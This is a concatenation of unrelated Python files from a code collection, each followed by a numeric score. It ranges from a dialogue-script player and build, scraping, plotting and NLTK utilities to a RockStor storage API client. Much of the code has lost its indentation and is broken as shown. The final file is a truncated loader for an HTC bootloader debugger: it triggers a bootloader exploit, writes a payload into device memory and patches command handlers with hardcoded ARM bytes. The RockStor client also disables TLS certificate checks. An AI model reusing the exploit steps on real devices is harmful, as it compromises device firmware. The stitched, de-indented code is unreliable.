response["out"] += line.content + "\n";
if line.type is LineType.IN:
self.log("Conversation choice")
in_lines = self.get_in_lines()
# Print the options.
response["in"] = []
option_number = 0
for line in in_lines:
option_number += 1
print "%s %s" % (Color.green(str(option_number) + ":"), line.content)
response["in"].append(line.content)
# Get input.
if continuous:
option_chosen = self.get_choice(option_number) - 1
elif choice is not None:
# Use the choice given when the function was called
option_chosen = choice
# Now the choice has been made, erase it so it doesn't get reused.
choice = None
else:
# Because play is non-continuous, return the available choices.
# The caller will call play again when a choice has been made.
response["cursor"] = self.cursor
return response
# Move the cursor to whichever line was chosen.
chosen_line = in_lines[option_chosen]
self.move_cursor_to_line(chosen_line)
print
if line.type is LineType.QUIT:
self.log("Quit")
break
if line.type is LineType.BOOKMARK:
self.log("Bookmark " + line.content + " skipped")
self.cursor += 1
response["action"] = "stop"
response["in"] = []
return response
def move_cursor_forward(self):
self.cursor += 1
def move_cursor_to_line(self, line):
self.cursor = self.lines.index(line)
def move_cursor_to_bookmark(self, name):
for line in self.lines:
if line.type is LineType.BOOKMARK and line.content == name:
self.move_cursor_to_line(line)
return
self.log("Couldn't find bookmark " + name)
def current_line(self):
return self.lines[self.cursor]
def get_in_lines(self):
"""Returns a list of all IN lines that belong to the same
set as the IN line that the cursor is on."""
indentation = self.current_line().indentation
in_lines = []
for line in self.lines[self.cursor:]:
if line.indentation < indentation:
# A dedent implies that the IN group has ended.
break
if line.indentation > indentation:
# An indent implies that this line is a child of
# a previous IN line.
continue
if line.type is LineType.IN:
# Match!
in_lines.append(line)
else:
# This line is on the same indentation level
# but is not an IN line, which implies that the
# group has ended.
break
return in_lines
def get_choice(self, max_number):
while True:
print ("Choose an option between 1 and %d:" % max_number),
inp = raw_input()
try:
inp_int = int(inp)
except ValueError:
print "That's not a number!"
else:
if inp_int > 0 and inp_int <= max_number:
return inp_int
print "That number isn't one of the available choices."
def strip_out(line):
"""Returns a string without the OUT token on the front,
if the string has one."""
if line.startswith("<-"):
return line[3:]
return line
def get_player(path):
with open(path) as f:
source = f.readlines()
lines = ReconReader.get_lines(source)
return ReconPlayer(lines)
def show_lines():
with open("recon/test.recon") as f:
source = f.readlines()
lines = ReconReader.translate(source)
lines = ReconReader.concatenate_continuations(lines)
print ""
print "DUMP"
print "===="
print
for line in lines:
print line
def play(script_name):
colorama.init()
get_player("recon/%s.recon" % script_name).play()
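# Hypothetical sketch (not part of the original module) of the non-continuous
# protocol described in play(): each call returns the pending choices plus a
# cursor, and the caller resumes by passing the cursor and a choice back in.
def play_stepwise(script_name, choose=lambda options: 0):
    player = get_player("recon/%s.recon" % script_name)
    response = player.play(continuous=False)
    while response["action"] == "input":
        # choose() picks an option index from response["in"]; the default
        # here always takes the first option.
        response = player.play(continuous=False,
                               cursor=response["cursor"],
                               choice=choose(response["in"]))
    return response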
| 0.001857 |
"""SCons.Tool.nasm
Tool-specific initialization for nasm, the famous Netwide Assembler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/nasm.py 2014/09/27 12:51:43 garyo"
import SCons.Defaults
import SCons.Tool
import SCons.Util
ASSuffixes = ['.s', '.asm', '.ASM']
ASPPSuffixes = ['.spp', '.SPP', '.sx']
if SCons.Util.case_sensitive_suffixes('.s', '.S'):
ASPPSuffixes.extend(['.S'])
else:
ASSuffixes.extend(['.S'])
def generate(env):
"""Add Builders and construction variables for nasm to an Environment."""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in ASSuffixes:
static_obj.add_action(suffix, SCons.Defaults.ASAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
for suffix in ASPPSuffixes:
static_obj.add_action(suffix, SCons.Defaults.ASPPAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
env['AS'] = 'nasm'
env['ASFLAGS'] = SCons.Util.CLVar('')
env['ASPPFLAGS'] = '$ASFLAGS'
env['ASCOM'] = '$AS $ASFLAGS -o $TARGET $SOURCES'
env['ASPPCOM'] = '$CC $ASPPFLAGS $CPPFLAGS $_CPPDEFFLAGS $_CPPINCFLAGS -c -o $TARGET $SOURCES'
def exists(env):
return env.Detect('nasm')
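# A minimal usage sketch (assumed, not taken from the SCons manual verbatim):
# the tool is normally pulled in through the generic selection machinery in
# an SConstruct, e.g.
#
#     env = Environment(tools=['nasm'])
#     env.Object('boot.o', 'boot.asm')    # assembled via $ASCOM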
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 0.002674 |
"""
Scrapy Shell
See documentation in docs/topics/shell.rst
"""
from threading import Thread
from scrapy.commands import ScrapyCommand
from scrapy.shell import Shell
from scrapy.http import Request
from scrapy.utils.spider import spidercls_for_request, DefaultSpider
class Command(ScrapyCommand):
requires_project = False
default_settings = {'KEEP_ALIVE': True, 'LOGSTATS_INTERVAL': 0}
def syntax(self):
return "[url|file]"
def short_desc(self):
return "Interactive scraping console"
def long_desc(self):
return "Interactive console for scraping the given url"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("-c", dest="code",
help="evaluate the code in the shell, print the result and exit")
parser.add_option("--spider", dest="spider",
help="use this spider")
def update_vars(self, vars):
"""You can use this function to update the Scrapy objects that will be
available in the shell
"""
pass
def run(self, args, opts):
url = args[0] if args else None
spider_loader = self.crawler_process.spider_loader
spidercls = DefaultSpider
if opts.spider:
spidercls = spider_loader.load(opts.spider)
elif url:
spidercls = spidercls_for_request(spider_loader, Request(url),
spidercls, log_multiple=True)
# The crawler is created this way since the Shell manually handles the
# crawling engine, so the set up in the crawl method won't work
crawler = self.crawler_process._create_crawler(spidercls)
# The Shell class needs a persistent engine in the crawler
crawler.engine = crawler._create_engine()
crawler.engine.start()
self._start_crawler_thread()
shell = Shell(crawler, update_vars=self.update_vars, code=opts.code)
shell.start(url=url)
def _start_crawler_thread(self):
t = Thread(target=self.crawler_process.start,
kwargs={'stop_after_crawl': False})
t.daemon = True
t.start()
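# Typical invocations of this command (assumed examples):
#
#     scrapy shell http://example.com
#     scrapy shell http://example.com -c 'response.status'
#
# The -c form evaluates the given code in the shell, prints the result and
# exits, as wired up in add_options() above.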
| 0.000912 |
import os
import sys
import numpy as np
from matplotlib import pyplot as plt
from tools import data
class ImageND(object):
SENSOR = None
def __init__(self, filename, dimensions=3):
if dimensions < 3:
print "The image doesn't have the minimum of 3 dimensions"
sys.exit(1)
self.dimensions = dimensions
self.filename = filename
self.filepath = os.path.join(data.DATA_DIR, self.filename)
self.title = filename[2:15]
def __validate(self, image):
"""
Validate image, check that's n-'dimensions' channel image
"""
if image is not None and len(image.shape) >= self.dimensions:
return True
return False
def image(self):
"""
Returns the raw ndarray image
:rtype: ndarray
"""
image = data.mat_file(self.filepath).get(self.SENSOR)
if not self.__validate(image):
print "Invalid dimensions or sensor {0} isn't in the image".format(
self.sensor)
sys.exit(1)
return np.dstack(image)
    def nan_percentage(self):
        # Count the NaN values themselves and use float division so the
        # percentage is not truncated to zero under Python 2.
        nan_count = np.count_nonzero(np.isnan(self.image()))
        return (float(nan_count) / self.image().size) * 100
def date(self):
return data.parse_date(self.filename)
def show(self, colorbar=True):
plt.imshow(self.image())
plt.title(self.filename)
if colorbar:
plt.colorbar()
plt.show()
# =====================================
# Analysis
# =====================================
def rgb(self):
"""
Return 3-tuple with (r, g, b)
"""
red = self.channel("red")
green = self.channel("green")
blue = self.channel("blue")
return (red, green, blue)
def channel(self, channel=None):
"""
This function is to be overwritten in by subclass
"""
return None
class IbandImage(ImageND):
SENSOR = "ibands"
def channel(self, channel=None):
"""
Returns a specific channel, the options are:
- red, green, blue
:params:
:params channel: string with the specified channel
:rType: ndarray
"""
if channel == 'red':
return self.image()[:, :, 0]
elif channel == 'green':
return self.image()[:, :, 1]
elif channel == 'blue':
return self.image()[:, :, 2]
else:
print "Channel requested wasn't red, green or blue"
class MbandImage(ImageND):
SENSOR = "mbands"
def channel(self, channel=None):
"""
Returns a specific channel, the options are:
        - red
        - green
        - blue
:params:
:params channel: string with the specified channel
:rType: ndarray
"""
channel = channel.strip().lower()
if channel == 'red':
return self.image()[:, :, 2]
elif channel == 'green':
return self.image()[:, :, 1]
elif channel == 'blue':
return self.image()[:, :, 0]
else:
print "Channel requested wasn't red, green or blue"
class FcImage(ImageND):
SENSOR = "fc"
def channel(self, channel=None):
"""
Returns a specific channel, the options are:
        - red
        - green
        - blue
:params:
:params channel: string with the specified channel
:rType: ndarray
"""
channel = channel.strip().lower()
if channel == 'red':
return self.image()[:, :, 0]
elif channel == 'green':
return self.image()[:, :, 1]
elif channel == 'blue':
return self.image()[:, :, 2]
else:
print "Channel requested wasn't red, green or blue"
| 0 |
# Natural Language Toolkit: Gutenberg Corpus Reader
#
# Copyright (C) 2001-2006 University of Pennsylvania
# Author: Steven Bird <[email protected]>
# Edward Loper <[email protected]>
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
"""
Read tokens from the NLTK Gutenberg Corpus.
Project Gutenberg -- http://gutenberg.net/
This corpus contains selected texts from Project Gutenberg:
* Jane Austen (3)
* William Blake (2)
* G. K. Chesterton (3)
* King James Bible
* John Milton
* William Shakespeare (3)
* Walt Whitman
"""
from en.parser.nltk_lite.corpora import get_basedir
from en.parser.nltk_lite import tokenize
import os, re
items = [
'austen-emma',
'austen-persuasion',
'austen-sense',
'bible-kjv',
'blake-poems',
'blake-songs',
'chesterton-ball',
'chesterton-brown',
'chesterton-thursday',
'milton-paradise',
'shakespeare-caesar',
'shakespeare-hamlet',
'shakespeare-macbeth',
'whitman-leaves'
]
item_name = {
'austen-emma': 'Jane Austen: Emma',
'austen-persuasion': 'Jane Austen: Persuasion',
'austen-sense': 'Jane Austen: Sense and Sensibility',
'bible-kjv': 'King James Bible',
'blake-poems': 'William Blake: Poems',
    'blake-songs': 'William Blake: Songs of Innocence and Experience',
'chesterton-ball': 'G.K. Chesterton: The Ball and The Cross',
'chesterton-brown': 'G.K. Chesterton: The Wisdom of Father Brown',
'chesterton-thursday': 'G.K. Chesterton: The Man Who Was Thursday',
'milton-paradise': 'John Milton: Paradise Lost',
'shakespeare-caesar': 'William Shakespeare: Julius Caesar',
'shakespeare-hamlet': 'William Shakespeare: Hamlet',
'shakespeare-macbeth': 'William Shakespeare: Macbeth',
'whitman-leaves': 'Walt Whitman: Leaves of Grass',
}
def raw(files = items):
if type(files) is str: files = (files,)
for file in files:
path = os.path.join(get_basedir(), "gutenberg", file + ".txt")
f = open(path)
preamble = True
for line in f.readlines():
if not preamble:
for t in tokenize.wordpunct(line):
yield t
if line[:5] == '*END*':
preamble = False
def demo():
from en.parser.nltk_lite.corpora import gutenberg
from itertools import islice
for word in islice(gutenberg.raw('bible-kjv'), 0, 100):
print word,
if __name__ == '__main__':
demo()
| 0.003222 |
from .exceptions import CURLResponseFormatterException
from .colors import (
print_red,
print_green,
print_yellow,
print_blue,
)
from .pygments_formatter import PygmentsFormatter
class CURLResponseFormatter(object):
'''
Formats a CURL response to be nicer to read.
'''
def __init__(self, readable=None, buf=None, color_headers=False,
lexer=None, formatter=None, strip_headers=False,
color_body=True):
if readable is not None and buf is not None:
raise Exception('only pass a readable or a buf, not both')
self._color_body = color_body
self._readable = readable
self._buf = buf
self._color_headers = color_headers
self._lexer = lexer
self._formatter = formatter
self._mimetype = None
self._strip_headers = strip_headers
self._headers = []
def _set_buf(self):
if self._readable is not None:
if isinstance(self._readable, str):
# it is a file name and we should open it
try:
with open(self._readable, 'rb') as f:
self._buf = f.read()
except IOError:
raise CURLResponseFormatterException(
'passed a string `%s` that wasn\'t a readable file' %
self._readable
)
else:
# some other readable object
try:
self._buf = self._readable.read()
except AttributeError as e:
print(e)
raise CURLResponseFormatterException(
'passed a nonreadble nonfilename as readable'
)
if hasattr(self._readable, 'close'):
self._readable.close()
elif self._buf is None:
raise CURLResponseFormatterException('no readable or buf set')
if isinstance(self._buf, bytes):
self._buf = self._buf.decode('utf-8')
def _parse_body(self):
formatter = PygmentsFormatter(
lexer_alias=self._lexer, mimetype=self._mimetype,
formatter=self._formatter
)
self._buf = formatter.format_buf(self._buf, color=self._color_body)
def _parse(self):
self._set_buf()
while self._buf.startswith('HTTP'):
# Search for both of these... since some responses seem to be
# a little strange.
end1 = self._buf.find('\r\n\r\n')
end2 = self._buf.find('\n\n')
# If we found an \r\n\r\n before a \n\n use that
if end1 != -1:
end = end1
inc = 4
else:
end = end2
inc = 2
# this is an -i flag response
self._headers.append(Header(self._buf[:end]))
self._buf = self._buf[end+inc:]
if len(self._headers) >= 1:
self._mimetype = self._headers[-1].mimetype
self._parse_body()
def pretty_print(self):
self._parse()
if not self._strip_headers:
for header in self._headers:
header.pretty_print(colored=self._color_headers)
print('\n')
print(self._buf)
class Header(object):
def __init__(self, buf):
# We either have to split on \r\n or \n
headers = [h.strip() for h in buf.split('\r\n') if h.strip() != ""]
if len(headers) == 1:
headers = [h.strip() for h in buf.split('\n')]
# first index is the HTTP/VERSION CODE MSG line
self._http_line = headers.pop(0)
self._headers = headers
self.mimetype = None
# find the content type if it is there
for h in headers:
if h.lower().startswith('content-type:'):
self.mimetype = h.lower().split(':', 1)[1].strip()
if ';' in self.mimetype:
self.mimetype = self.mimetype.split(';', 1)[0]
def pretty_print(self, colored=True):
if colored:
code = self._http_line.split(' ', 2)[1].strip()
if code.startswith('5') or code.startswith('4'):
print_red(self._http_line)
elif code.startswith('2'):
print_green(self._http_line)
elif code.startswith('3'):
print_yellow(self._http_line)
else:
print(self._http_line)
for entry in self._headers:
entry = entry.split(':', 1)
print_blue(entry[0], end=': ')
print(entry[1].strip())
else:
print(self._http_line)
for entry in self._headers:
print(entry)
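# Minimal usage sketch (not part of the original module): format a `curl -i`
# style response held in memory, colouring the headers. The sample payload is
# an assumption.
def _demo():
    sample = ('HTTP/1.1 200 OK\r\n'
              'Content-Type: application/json\r\n'
              '\r\n'
              '{"ok": true}')
    CURLResponseFormatter(buf=sample, color_headers=True).pretty_print()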
| 0.001036 |
# Copyright (C) 2004-2008 Paul Cochrane
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
Example of plotting multiple curves with pyvisi
"""
import sys
numArgs = len(sys.argv)
if numArgs == 1:
ren_mod = "vtk"
else:
ren_mod = sys.argv[1]
# set up some data to plot
from numpy import *
x = arange(0, 2*pi, 0.1, dtype=float)
y1 = sin(x)
y2 = cos(x)
y3 = cos(x)**2
# example code for how a user would write a script in pyvisi
from pyvisi import * # base level visualisation stuff
# import the objects to render the scene using the specific renderer
if ren_mod == "gnuplot":
from pyvisi.renderers.gnuplot import * # gnuplot
elif ren_mod == "vtk":
from pyvisi.renderers.vtk import * # vtk
elif ren_mod == "plplot":
from pyvisi.renderers.plplot import * # plplot
else:
raise ValueError, "Unknown renderer module"
# define the scene object
# a Scene is a container for all of the kinds of things you want to put
# into your plot for instance, images, meshes, arrow/vector/quiver plots,
# contour plots, spheres etc.
scene = Scene()
# create a LinePlot object
plot = LinePlot(scene)
# add some helpful info to the plot
plot.title = 'Example 2D plot'
plot.xlabel = 'x'
plot.ylabel = 'y'
plot.linestyle = 'lines'
# assign some data to the plot
plot.setData(x, y1, y2, y3)
# render the scene to screen
scene.render(pause=True,interactive=True)
# save the scene to file
scene.save(fname="multiCurveLinePlot.png", format=PngImage())
# vim: expandtab shiftwidth=4:
| 0.004138 |
"""
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import requests
import time
import json
import base64
import settings
from storageadmin.exceptions import RockStorAPIException
from functools import wraps
from base_console import BaseConsole
from storageadmin.models import OauthApp
from django.conf import settings
API_TOKEN = None
def set_token(client_id=None, client_secret=None, url=None, logger=None):
if (client_id is None or client_secret is None or url is None):
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
app = OauthApp.objects.get(name=settings.OAUTH_INTERNAL_APP)
client_id = app.client_id()
client_secret = app.client_secret()
url = 'https://localhost'
token_request_data = {
'grant_type': 'client_credentials',
'client_id': client_id,
'client_secret': client_secret,
}
user_pass = '{0}:{1}'.format(client_id, client_secret)
auth_string = base64.b64encode(user_pass.encode('utf-8'))
auth_headers = {'HTTP_AUTHORIZATION':
'Basic ' + auth_string.decode("utf-8"), }
response = requests.post('%s/o/token/' % url,
data=token_request_data, headers=auth_headers,
verify=False)
try:
content = json.loads(response.content.decode("utf-8"))
global API_TOKEN
API_TOKEN = content['access_token']
return API_TOKEN
except Exception, e:
if (logger is not None):
logger.exception(e)
msg = ('Exception while setting access_token for url(%s). Make sure '
'credentials are correct: %s' % (url, e.__str__()))
raise Exception(msg)
def api_error(console_func):
@wraps(console_func)
def arg_wrapper(a1, a2):
try:
return console_func(a1, a2)
except RockStorAPIException, e:
print ('Operation failed due to the following error returned '
'from the server:')
print ('-----------------------------------------')
print e.detail
print ('-----------------------------------------')
return -1
return arg_wrapper
def api_call(url, data=None, calltype='get', headers=None, save_error=True):
if (API_TOKEN is None):
set_token()
api_auth_header = {'Authorization': 'Bearer ' + API_TOKEN, }
call = getattr(requests, calltype)
try:
if (headers is not None):
headers.update(api_auth_header)
            if (headers.get('content-type') == 'application/json'):
r = call(url, verify=False, data=json.dumps(data),
headers=headers)
else:
r = call(url, verify=False, data=data,
headers=headers)
else:
r = call(url, verify=False, headers=api_auth_header, data=data)
except requests.exceptions.ConnectionError:
print('Error connecting to Rockstor. Is it running?')
return {}
if (r.status_code == 404):
msg = ('Invalid api end point: %s' % url)
raise RockStorAPIException(detail=msg)
if (r.status_code != 200):
try:
error_d = json.loads(r.text)
if (settings.DEBUG is True and save_error is True):
cur_time = str(int(time.time()))
err_file = '/tmp/err-%s.html' % cur_time
with open(err_file, 'w') as efo:
for line in r.text.split('\n'):
efo.write('%s\n' % line)
print('Error detail is saved at %s' % err_file)
if ('detail' in error_d):
if (error_d['detail'] == 'Authentication credentials were not provided.'):
set_token()
return api_call(url, data=data, calltype=calltype,
headers=headers, save_error=save_error)
raise RockStorAPIException(detail=error_d['detail'])
except ValueError:
raise RockStorAPIException(detail='Internal Server Error')
r.raise_for_status()
try:
ret_val = r.json()
except ValueError:
ret_val = {}
return ret_val
def print_pools_info(pools_info):
if (pools_info is None or
not isinstance(pools_info, dict) or
len(pools_info) == 0):
print('There are no pools on the appliance.')
return
try:
if ('count' not in pools_info):
pools_info = [pools_info]
else:
pools_info = pools_info['results']
print("%(c)sPools on the appliance\n%(e)s" % BaseConsole.c_params)
print("Name\tSize\tFree\tReclaimable\tRaid")
for p in pools_info:
print_pool_info(p)
except Exception, e:
print('Error displaying pool info')
def print_pool_info(p, header=False):
try:
if header:
print "%(c)sPool info%(e)s\n" % BaseConsole.c_params
print("Name\tSize\tFree\tReclaimable\tRaid")
p['size'] = sizeof_fmt(p['size'])
p['free'] = sizeof_fmt(p['free'])
p['reclaimable'] = sizeof_fmt(p['reclaimable'])
print('%s%s%s\t%s\t%s\t%s\t%s' % (BaseConsole.c, p['name'],
BaseConsole.e, p['size'], p['free'],
p['reclaimable'], p['raid']))
except Exception, e:
print e
print('Error displaying pool info')
def print_scrub_status(pool_name, scrub_info):
try:
print '%sScrub status for %s%s' % (BaseConsole.c, pool_name,
BaseConsole.e)
kb_scrubbed = None
if ('kb_scrubbed' in scrub_info):
kb_scrubbed = scrub_info['kb_scrubbed']
status = scrub_info['status']
print '%sStatus%s: %s' % (BaseConsole.c, BaseConsole.e, status)
if (status == 'finished'):
print '%sKB Scrubbed%s: %s' % (BaseConsole.c, BaseConsole.e,
kb_scrubbed)
except Exception, e:
print e
print('Error displaying scrub status')
def print_shares_info(shares):
if (shares is None or
not isinstance(shares, dict) or
len(shares) == 0):
print('There are no shares in the system')
return
try:
if ('count' not in shares):
shares = [shares]
else:
shares = shares['results']
print("%(c)sShares on the appliance%(e)s\n" % BaseConsole.c_params)
print("Name\tSize(KB)\tUsage(KB)\tPool")
for s in shares:
print_share_info(s)
except Exception, e:
print e
print('Error displaying share info')
def print_share_info(s, header=False):
try:
if header:
print "%(c)sShare info%(e)s\n" % BaseConsole.c_params
print("Name\tSize(KB)\tUsage(KB)\tPool")
print('%s\t%s\t%s\t%s' %
(s['name'], s['size'], s['r_usage'], s['pool']['name']))
except Exception, e:
print e
print('Error displaying share info')
def print_disks_info(disks_info):
if (disks_info is None or
not isinstance(disks_info, dict) or
len(disks_info) == 0):
print('There are no disks on the appliance.')
return
try:
if ('results' not in disks_info):
            # POST is used; the response is already a list of disks
            pass
elif ('count' not in disks_info):
disks_info = [disks_info]
else:
disks_info = disks_info['results']
print("%sDisks on this Rockstor appliance%s\n" % (BaseConsole.u,
BaseConsole.e))
print("Name\tSize\tPool")
for d in disks_info:
print_disk_info(d)
except Exception, e:
print('Error displaying disk info')
def print_disk_info(d, header=False):
try:
if header:
print "%(u)sDisk info%(e)s\n" % BaseConsole.c_params
print("Name\tSize\tPool")
d['size'] = sizeof_fmt(d['size'])
print('%s%s%s\t%s\t%s' % (BaseConsole.c, d['name'],
BaseConsole.e, d['size'], d['pool_name']))
except Exception, e:
print e
print('Error displaying disk info')
def print_export_info(export_info):
if (export_info is None or
not isinstance(export_info, dict) or
len(export_info) == 0):
print('%(c)sThere are no exports for this share%(e)s' %
BaseConsole.c_params)
return
try:
if ('count' not in export_info):
export_info = [export_info]
else:
export_info = export_info['results']
if (len(export_info) == 0):
print('%(c)sThere are no exports for this share%(e)s' %
BaseConsole.c_params)
else:
print ("%(c)sList of exports for this share%(e)s" %
BaseConsole.c_params)
print("Id\tMount\tClient\tWritable\tSyncable\tEnabled")
for e in export_info:
print('%s\t%s\t%s\t%s\t%s\t%s' %
(e['id'], e['exports'][0]['mount'], e['host_str'],
e['editable'], e['syncable'], e['enabled']))
except Exception, e:
print e
print('Error displaying nfs export information')
def sizeof_fmt(num):
for x in ['K', 'M', 'G', 'T', 'P', 'E']:
if (num < 0.00):
num = 0
break
if (num < 1024.00):
break
else:
num /= 1024.00
x = 'Z'
return ("%3.2f%s" % (num, x))
| 0.000871 |
#%matplotlib inline
import sys
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
print sys.argv
if len(sys.argv) > 1:
df = pd.read_csv(sys.argv[1])
else:
df = pd.read_csv("MAPT_ExACScores.csv")
high_frequency = df[df["ALLELE FREQUENCY"]>0.05]
x = list(high_frequency["AA_POS"])
y = list(high_frequency["ALLELE FREQUENCY"])
mutation = list(high_frequency["MUTATION"])
x_dup = [x[0]]
y_dup = [y[0]]
mutation_dup = [mutation[0]]
for aa in range(1, len(x)):
if x[aa] == x[aa-1]:
mutation_dup[-1] = mutation_dup[-1] + ', ' + mutation[aa]
else:
x_dup.append(x[aa])
y_dup.append(y[aa])
mutation_dup.append(mutation[aa])
fig = plt.figure()
ax = fig.add_subplot(111)
x = list(df.AA_POS)
y = list(df["ALLELE FREQUENCY"])
plt.plot(x, y)
plt.axhline(y=0.05, color='r')
for i in range(len(x_dup)):
ax.annotate(mutation_dup[i], xy=[x_dup[i],y_dup[i]], textcoords='data', rotation=70)
plt.grid()
plt.savefig('variant_plot.tiff')
#plt.show()
| 0.005803 |
#! /usr/bin/env python3
# This file is part of hbootdbg.
# Copyright (c) 2013, Cedric Halbronn <[email protected]>
# Copyright (c) 2013, Nicolas Hureau <[email protected]>
# All right reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# * Neither the name of the {organization} nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import binascii
import os
import struct
import sys
import time
from hboot import HbootClient
PRELOADER_PATH = '../src'
DEBUGGER_PATH = '../src'
TTY='/dev/ttyUSB0'
##
# Preloader commands
##
READ_MEM = 7
WRITE_MEM = 8
##
# Supported firmware revisions.
##
# cmd_hook: address of function to hook
# preload_addr: where the preloader is uploaded (device specific)
DEVICE_OFFSETS = {
'vision_0.85.0005' : {
'fb_oem_hook' : 0x0, # FIXME
'hb_keytest_hook' : 0x0, # FIXME
'preloader' : 0x0, # FIXME
'payload' : 0x0, # FIXME
},
'vision_0.85.0015' : {
'fb_oem_hook' : 0x8D0020C8,
'hb_keytest_hook' : 0x8D010DF0,
'preloader' : 0x058D3000,
'payload' : 0x8D0E2000, # Where the debugger is uploaded
},
'saga_0.98.0002' : {
'fb_oem_hook' : 0x8D00236C,
'hb_keytest_hook' : 0x0, # FIXME
'preloader' : 0x069D3000,
'payload' : 0x0, # FIXME
},
}
def dbg_read_memory(fbc, addr, size):
cmd = struct.pack('=BII', READ_MEM, addr, size)
data = fbc.preloader(cmd)
return data
def dbg_write_memory(fbc, dest, data):
(res1, res2) = fbc.download_data(data)
cmd = struct.pack('=BII', WRITE_MEM, dest, len(data))
data = fbc.preloader(cmd)
return data
def step(msg, step_function, *args, out=sys.stderr, continue_on_fail=False):
out.write('[*] %s' % msg)
out.flush()
    (success, error_msg) = step_function(*args)
if success:
out.write('\r[+] %s: %s\n' % (msg, error_msg))
else:
out.write('\r[!] %s: %s\n' % (msg, error_msg))
out.flush()
if not success and not continue_on_fail:
sys.exit(1)
##
# Get HBOOT version
##
def get_hboot_version(fbc):
global offsets
(res1, version0) = fbc.getvar('version-bootloader')
(res2, product) = fbc.getvar('product')
version='%s_%s' % (product.decode(), version0.decode())
if res1 != b'OKAY' or res2 != b'OKAY':
return (False, 'Unknown device revision %s, aborting' % version)
offsets = DEVICE_OFFSETS[version]
return (True, version)
##
# Copy preloader stub
##
def copy_preloader(fbc):
(res1,res2) = fbc.download('%s/preloader.bin' % PRELOADER_PATH)
return (True, 'OK')
##
# Trigger revolutionary exploit
##
def trigger_exploit(fbc):
(res, version_main) = fbc.getvar('version-main')
return (True, 'OK')
##
# Check if exploit successful
##
def check_exploit_result(fbc):
(res, version0) = fbc.getvar('version-bootloader')
return (version0 == b'HACK', version0.decode())
##
# We can now use the preloader function to inject the real payload faster.
##
def copy_hbootdbg(fbc):
data = b''
with open('%s/hbootdbg.bin' % DEBUGGER_PATH, 'br') as f:
data = dbg_write_memory(fbc, offsets['payload'], f.read())
return (True, 'OK')
##
# Patch fastboot oem and hboot keytest to point at final payload
##
# patch:
# 10 40 2D E9 STMFD SP!, {R4,LR}
# 0F E0 A0 E1 MOV LR, PC
# 00 F0 1F E5 LDR PC, =0x8D0E2000
# 10 80 BD E8 LDMFD SP!, {R4,PC}
# 00 00 0E 8D DCD 0x8D0E2000
def patch_cmds(fbc):
global offsets
patch = b'\x10\x40\x2D\xE9'
patch += b'\x0F\xE0\xA0\xE1'
